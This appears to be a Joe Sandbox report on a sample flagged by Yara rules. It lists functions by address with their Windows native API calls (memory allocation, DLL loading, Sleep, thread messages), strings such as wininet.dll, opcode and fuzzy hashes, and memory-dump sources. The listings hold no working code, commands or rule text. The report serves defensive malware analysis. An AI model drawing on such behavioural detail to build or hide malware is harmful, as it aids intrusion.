API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 17b9441ee59e0f2f74a6dd04efdc99d00a8a4731c4a8d0f4964ece3c2827c806
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: F3F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97245D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA52C Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00CC2D11,00002000,00003000,00000004), ref: 00CDA569

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 650188158c2e61ce86f1164cf2de2e94e8c24466dc2018f2a65ef362067755bc
Instruction ID: d6de005bae1c12db9d2610b3677e39c78c97023b0dac43f562eff062152be247
Opcode Fuzzy Hash: 650188158c2e61ce86f1164cf2de2e94e8c24466dc2018f2a65ef362067755bc
Instruction Fuzzy Hash: 0DF0F2B2200208ABCB14DF88CC91EAB77A9AF88754F158149BA1897341C630E910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00CC2D11,00002000,00003000,00000004), ref: 00CDA569

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 26f0c3652a48fa241e3ccb9c586aef843df6d016947dce0c5b11baddf93f28f9
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 7BF015B2200208AFCB14DF89CC81EAB77ADEF88754F118149BE1C97241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00CD4D40,?,?,00CD4D40,00000000,FFFFFFFF), ref: 00CDA4A5

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 6ca8c927d132661c3b90f356c28787d93eb56b13fe23d8f69c7e54930d820f06
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 18D01776200214ABD710EBD8CC85EA77BACEF48760F154499BA1C9B242C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA47C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00CD4D40,?,?,00CD4D40,00000000,FFFFFFFF), ref: 00CDA4A5

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 62d877475298a1e9e5c74f8f03273187817c5d38c9d9f8d377c7e10be28e1f4a
Instruction ID: 332982056049e365f1ad25c2cc6c95754ebf3b4507ba333ec97181bf79374f27
Opcode Fuzzy Hash: 62d877475298a1e9e5c74f8f03273187817c5d38c9d9f8d377c7e10be28e1f4a
Instruction Fuzzy Hash: 65E01776600214ABD720EBD8CC85FA77B68EF48760F158499BA1CAB246C530FA008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 04E82CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82CAA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8cc45c7acc8993398c35485a3d9bcecfa1a0f43b98866e6d22f9778343e0e9df
Instruction ID: 2726095e8aaaddefb069a507497fdc9f6527065055db0d72f037e654a9acd8fc
Opcode Fuzzy Hash: 8cc45c7acc8993398c35485a3d9bcecfa1a0f43b98866e6d22f9778343e0e9df
Instruction Fuzzy Hash: BA90023121140402F5407598540964600459BE1305F55E011A542955AEC6A5DD916135

Uniqueness

Uniqueness Score: -1.00%

Function 04E82C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82C6A

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6cf558cd188d9f479f38ce543c61480ded46e9e9bf0878d5a64ce6844da7acb2
Instruction ID: a0dc7ccbeb86fab12777a3fed1eff2ca8175cfaaf9282e438d93ba80e64e04a9
Opcode Fuzzy Hash: 6cf558cd188d9f479f38ce543c61480ded46e9e9bf0878d5a64ce6844da7acb2
Instruction Fuzzy Hash: 6C90023121140842F54071584405B4600459BE1305F55D016A0529659D8655DD517525

Uniqueness

Uniqueness Score: -1.00%

Function 04E82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82C7A

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a36340a4932b4cc771df6a16aef5befaf96f1a4aa51c191909cff0066b9c75cb
Instruction ID: a83cf8997fbe396bfd4b18475ffbb6156f9f7fa21119109351f9ebe9d535dc3b
Opcode Fuzzy Hash: a36340a4932b4cc771df6a16aef5befaf96f1a4aa51c191909cff0066b9c75cb
Instruction Fuzzy Hash: 8590023121148802F5507158840574A00459BD1305F59D411A482965DD86D5DD917125

Uniqueness

Uniqueness Score: -1.00%

Function 04E82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82DFA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 234a4c0227cf51290dc737ee93867b4a173dae218a793e3aa683b943d3464094
Instruction ID: cfae25ee21bfbf24592fb758b7b028e5a85fca0234121f85b3f9f044ad734e83
Opcode Fuzzy Hash: 234a4c0227cf51290dc737ee93867b4a173dae218a793e3aa683b943d3464094
Instruction Fuzzy Hash: 3490023121140413F5517158450570700499BD1245F95D412A082955DD9696DE52A125

Uniqueness

Uniqueness Score: -1.00%

Function 04E82DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82DDA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24029d9cd81d43711ee571569dd5cd2af446a32f2f6f9301142ddae4e39fa3be
Instruction ID: 6eaf3171eed55d2d7f6a40e5a0017d0fa810f79cd6385440d4079b91ccb6c033
Opcode Fuzzy Hash: 24029d9cd81d43711ee571569dd5cd2af446a32f2f6f9301142ddae4e39fa3be
Instruction Fuzzy Hash: 9D900231252441527985B15844055074046ABE1245795D012A1819955C8566ED56D625

Uniqueness

Uniqueness Score: -1.00%

Function 04E82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82D1A

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a7bf7b9390819f0c213cfa1ef36a0a17e6ab523de5dc3de71a9d0c3f118c060
Instruction ID: 19d7345cd64ac62c55531e7e0c54e22fa5928bbdf85b88f32f2c2b144bdc4b3c
Opcode Fuzzy Hash: 7a7bf7b9390819f0c213cfa1ef36a0a17e6ab523de5dc3de71a9d0c3f118c060
Instruction Fuzzy Hash: 2490023922340002F5C07158540960A00459BD2206F95E415A041A55DCC955DD695325

Uniqueness

Uniqueness Score: -1.00%

Function 04E82EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82EAA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 76701bf522229da3a767b82a689b6b25e0ce05715312eb3c9e23e3be433d5f78
Instruction ID: bf3e66aa5a106a949b6d52c006c168aeae9be6a5cfb48d82fdba7224166f80a4
Opcode Fuzzy Hash: 76701bf522229da3a767b82a689b6b25e0ce05715312eb3c9e23e3be433d5f78
Instruction Fuzzy Hash: 2590027121140402F5807158440574600459BD1305F55D011A5469559E8699DED56669

Uniqueness

Uniqueness Score: -1.00%

Function 04E82FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82FEA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b1ee6386c5a2f65e6f462bfe46d0d435d2bfdbacfddbf5c149e03b13ebe76bd
Instruction ID: 7561452ebf5b66f30cebc45e3a77b6a02443ea52086e520c851f8fdcb180eac5
Opcode Fuzzy Hash: 7b1ee6386c5a2f65e6f462bfe46d0d435d2bfdbacfddbf5c149e03b13ebe76bd
Instruction Fuzzy Hash: AB900231221C0042F64075684C15B0700459BD1307F55D115A0559559CC955DD615525

Uniqueness

Uniqueness Score: -1.00%

Function 04E82F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82F3A

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c2063efd8d6f047eb70cfe05cea0294d725ac552a6d9424e4162dd02fd99bd3
Instruction ID: 3024c9552ef66f966becee9ff0de0c8e1a8d8431fb9925e2c012cd9139567f90
Opcode Fuzzy Hash: 1c2063efd8d6f047eb70cfe05cea0294d725ac552a6d9424e4162dd02fd99bd3
Instruction Fuzzy Hash: 6E90027135140442F54071584415B060045DBE2305F55D015E1469559D8659DD52612A

Uniqueness

Uniqueness Score: -1.00%

Function 04E82AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82ADA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41d8d6cb7d278ede1e8f041a12d0a286f9b647bcb66ceed2fa901eae4d5249d5
Instruction ID: aee1b9f36975cf86948c937e168b1a3a8a0dce842bc04253e7995b316db0f440
Opcode Fuzzy Hash: 41d8d6cb7d278ede1e8f041a12d0a286f9b647bcb66ceed2fa901eae4d5249d5
Instruction Fuzzy Hash: 11900235221400032545B558070550700869BD6355355D021F141A555CD661DD615125

Uniqueness

Uniqueness Score: -1.00%

Function 04E82BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82BEA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 031ab05cd5aa3cd0fe7090bb2b3465b30aa0f0ff5c87ed239c2f13a62fe7741d
Instruction ID: f2de3ed51983b340e8fdac9d01db6b18708fd85ecd914e5e488bf89fb5fbeaa2
Opcode Fuzzy Hash: 031ab05cd5aa3cd0fe7090bb2b3465b30aa0f0ff5c87ed239c2f13a62fe7741d
Instruction Fuzzy Hash: 8390023121544842F58071584405A4600559BD1309F55D011A0469699D9665DE55B665

Uniqueness

Uniqueness Score: -1.00%

Function 04E82BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82BFA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4b657525b05cdf9726ae573b4248a28570b0342803c11302a1a867f7a2941b2
Instruction ID: af4b55e0ac6b4beb92f205a3c19af337e689d4f44edcdac97bd21b9533a9b585
Opcode Fuzzy Hash: b4b657525b05cdf9726ae573b4248a28570b0342803c11302a1a867f7a2941b2
Instruction Fuzzy Hash: FF90023121140802F5C07158440564A00459BD2305F95D015A042A659DCA55DF5977A5

Uniqueness

Uniqueness Score: -1.00%

Function 04E82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82B6A

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2dc200e5734845558dee7f7456d2b8362308af2ab80272f187516fabeeadd7bc
Instruction ID: 73fe4c267dbe126a85c6ebae0798d6e20786779c4f9d5f291bc1d3f9d73f39ad
Opcode Fuzzy Hash: 2dc200e5734845558dee7f7456d2b8362308af2ab80272f187516fabeeadd7bc
Instruction Fuzzy Hash: 0990027121240003654571584415616404A9BE1205B55D021E1419595DC565DD916129

Uniqueness

Uniqueness Score: -1.00%

Function 04E835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E835CA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbd8a44a03da6a98df38a6c054061f1cf21091c2c1c7dc3c40aa514d5a860bf8
Instruction ID: 22910530974eddf532a40ae7df8257f8f9e5c1480f35be8a652b614e9ad9dfaa
Opcode Fuzzy Hash: dbd8a44a03da6a98df38a6c054061f1cf21091c2c1c7dc3c40aa514d5a860bf8
Instruction Fuzzy Hash: 0B90023161550402F5407158451570610459BD1205F65D411A082956DD87D5DE5165A6

Uniqueness

Uniqueness Score: -1.00%

Function 00CD9070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00CD9118

Strings

wininet.dll, xrefs: 00CD90CE, 00CD90D7
net.dll, xrefs: 00CD90E1, 00CD9167, 00CD913F, 00CD914B, 00CD9173

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
Instruction ID: 28086859383a77f11506ae7af188478d4c684b1ed3daa4b7f076ec563e183c2b
Opcode Fuzzy Hash: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
Instruction Fuzzy Hash: F83172B6500645BBC714DF64C885FABB7B8FB48701F10851EF72A5B345D634A650CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CD906B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00CD9118

Strings

wininet.dll, xrefs: 00CD90CE, 00CD90D7
net.dll, xrefs: 00CD90E1, 00CD913F, 00CD914B

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 04853f2662827e0829f80ff28e7c941bffe875c2515fde8e25bcb01adbb8c8ae
Instruction ID: 4601df56a77c41a7159644a8da17bf680c273abdfb6af52c134c457ef8691024
Opcode Fuzzy Hash: 04853f2662827e0829f80ff28e7c941bffe875c2515fde8e25bcb01adbb8c8ae
Instruction Fuzzy Hash: EA21A0B6A40245BBC714EF64C889BABB7B4FB48700F10801EF7296B345D774A650CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00CC3AF8), ref: 00CDA68D

Strings

.z`, xrefs: 00CDA67C, 00CDA688

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: c434b1dc8ac16610ad368816b7635925283a6d8590cc16fa8c119f51ed6d355b
Instruction ID: be01650ff8979df1c699407ef7399240e01526e143b409a8be0ef68326536ad1
Opcode Fuzzy Hash: c434b1dc8ac16610ad368816b7635925283a6d8590cc16fa8c119f51ed6d355b
Instruction Fuzzy Hash: 5FF09CB1600204AFD714EFA4DC44DEB77A9EF84754F054555F96C5B305D531E910CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00CC3AF8), ref: 00CDA68D

Strings

.z`, xrefs: 00CDA67C, 00CDA688

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 00d0f329d80a68ffa47b5e75cb04d86214ca8950756567bc2682b5289ddf6909
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 93E012B1200208ABDB18EF99CC49EA777ACEF88750F018599BA1C5B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC8308 Relevance: 3.1, APIs: 2, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00CC836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00CC838B

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 1e141ccd8c40199bda3c6d59da27b2c83b26e198fe6d89ce6d4a23a18a85a033
Instruction ID: d129506fbb495855fdf43463640459375da6fc077739a891f4f70208be5f1110
Opcode Fuzzy Hash: 1e141ccd8c40199bda3c6d59da27b2c83b26e198fe6d89ce6d4a23a18a85a033
Instruction Fuzzy Hash: F601B572A4021877EB25AA94CC03FFE776CAB40F51F15411DFF04BA1C2E7A46A0696E5

Uniqueness

Uniqueness Score: -1.00%

Function 00CC8310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00CC836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00CC838B

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: 6d7bf31a01eb4f2ef50a7bd2186d26ddbb978a75ddfaa3b66253c532543a3fa1
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: 2C01A731A8022877E721A694DC43FFF776C6B40F51F050119FF04BA1C2E6A46A0546F6

Uniqueness

Uniqueness Score: -1.00%

Function 00CCACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00CCAD52

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
